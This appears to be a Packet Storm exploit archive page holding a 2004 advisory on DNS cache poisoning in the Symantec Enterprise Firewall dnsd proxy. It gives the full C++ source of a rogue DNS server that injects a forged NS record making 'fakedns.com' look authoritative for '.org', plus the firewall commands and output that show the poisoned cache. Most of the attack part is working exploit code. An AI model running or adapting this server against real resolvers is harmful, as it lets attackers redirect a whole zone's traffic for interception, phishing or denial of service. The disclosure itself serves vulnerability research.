exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dnsPoison.cpp.txt

dnsPoison.cpp.txt
Posted Jun 18, 2004
Authored by fryxar

Symantec Enterprise Firewall dnsd proxy, versions 8 and later, is vulnerable to cache poisoning attacks when acting as a caching nameserver. Full proof of concept exploit included.

tags | exploit, proof of concept
SHA-256 | cb84018e4595e260c546cc412ec384eecb358019a95b682a3b76aa4857dc9956

dnsPoison.cpp.txt

Change Mirror Download
  Symantec Enterprise Firewall dnsd proxy, versions 8 and later, is
vulnerable to cache poisoning attacks when acting as a caching
nameserver. Is possible to inject false entries in its cache and make a
false DNS server look like authoritative of a zone, when it is not. Once
this information is loaded any request to a subdomain of that zone, will
be submitted to the false DNS.

To do that, a maliciousus DNS server responding to a query, but not
necessarily with an answer, fills in the authoritative and additional
records section of the DNS response message with information that did
not necessarily relate to the answer. As we can see, DNSD SEF proxy
accepts this response and did not perform any necessary checks to assure
that the this information was correct or even related in some way to the
answer (i.e., that the responding server had appropriate authority over
those records).

We have found some public DNS servers that use this vulnerability to
redirect unregistered domains to their sites. It also could be used to
do Man-In-The-Middle / Denial of Services / Social Engineering Attacks.


Solution:
At the time of this writing, no solution was available.


Proof (Solaris 9 / SEF 8 and SEF 7.0.4):

In an authoritative nameserver (i.e. I used afraid.org dynamic DNS that
supports domain NS delegation), compile and run the following small DNS
server:

#########################################################
# Begin poc.cpp
#########################################################

// PoC poisoning cache attack SEF 8 and later (by fryxar)
// Requires poslib 1.0.4 library
// Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc

#define POS_DEFAULTLOG
#define POS_DEFAULTLOG_STDERR
#define POS_DEFAULTLOG_SYSLOG

// Server include file
#include <poslib/server/server.h>

// For signal handling
#include <stdlib.h>
#include <signal.h>

char *dyndomain;

DnsMessage *my_handle_query(pending_query *query);

void cleanup(int sig) {
// close down the server system
pos_setquitflag();
}

int main(int argc, char **argv) {
_addr a;

try {
/* get command-line arguments */
if (argc != 2 ) {
printf( "Usage: %s [domainname]\n", argv[0] );
return 1;
} else {
dyndomain = argv[1];
txt_to_addr(&a, "any");
}

poslib_config_init();

/* bring up posadis */
servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a)));

// use the posadis logging system
pos_log(context_none, log_info, "Proof of concept DNS server starting
up...");

// set signal handlers
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);

// set query function
handle_query = my_handle_query;

// run server
posserver_run();
} catch (PException p) {
printf("Fatal exception: %s\n", p.message);
return 1;
}

return 0;
}

/* the entry function which will handle all queries */
DnsMessage *my_handle_query(pending_query *query) {
DnsMessage *a = new DnsMessage();
DnsQuestion q;
DnsRR rr;

/* set a as an answer to the query */
a->ID = query->message->ID;
a->RD = query->message->RD;
a->RA = false;

if (query->message->questions.begin() ==
query->message->questions.end()) {
/* query did not contain question */
a->RCODE = RCODE_QUERYERR;
return a;
}
q = *query->message->questions.begin();
a->questions.push_back(q);
a->QR = true;

pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(),
str_qtype(q.QTYPE).c_str());

if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) {
rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600);
string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); //
Anything...
rr.RDLENGTH = data.size();
rr.RDATA = (char *)memdup(data.c_str(), data.size());
a->answers.push_back(rr);

rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600);
data = rr_fromstring(DNS_TYPE_NS, "fakedns.com");
rr.RDLENGTH = data.size();
rr.RDATA = (char *)memdup(data.c_str(), data.size());
a->authority.push_back(rr);

rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600);
data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything...
rr.RDLENGTH = data.size();
rr.RDATA = (char *)memdup(data.c_str(), data.size());
a->additional.push_back(rr);
} else {
/* we don't want this */
a->RCODE = RCODE_SRVFAIL;
}
return a;
}
#########################################################
# End poc.cpp
#########################################################


fryxar.afraid.org # ./poc fryxar.afraid.org

and now, in your SEF Firewall:

firewall # kill `ps -ef | awk '/[d]nsd/ { print $2 }'` # Cleaning the
cache

firewall # nslookup afraid.org 127.0.0.1 # Caching org. NS
Server: localhost
Address: 127.0.0.1

Non-authoritative answer:
Name: afraid.org
Addresses: 69.42.89.56, 69.42.89.53, 69.42.89.55, 69.42.89.54

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
172775 NS TLD2.ULTRADNS.NET.
172775 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

firewall # nslookup fryxar.afraid.org 127.0.0.1 # Domain owned by my
poisoned DNS
Server: localhost
Address: 127.0.0.1

Non-authoritative answer:
Name: fryxar.afraid.org
Address: 200.200.200.200

firewall # kill -USR1 `ps -ef | awk '/[d]nsd/ { print $2 }'` # dnsd dump

firewall # sed -n '/^org.$/,/^[^ ]/p' /usr/adm/sg/dnsd.dat # show cached
"org." NS
org.
3567 NS fakedns.com. <- Ooohh!
3567 NS TLD2.ULTRADNS.NET.
3567 NS TLD1.ULTRADNS.NET.
2.110.45.209.in-addr.jjc.com.pe.

And now SEF "thinks" that fakedns.com server is an authoritative
nameserver of "org." domain, learned by fryxar.afraid.org DNS server
that is only authoritative for the fryxar.afraid.org domain.
--
fryxar <fryxar@datafull.com>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close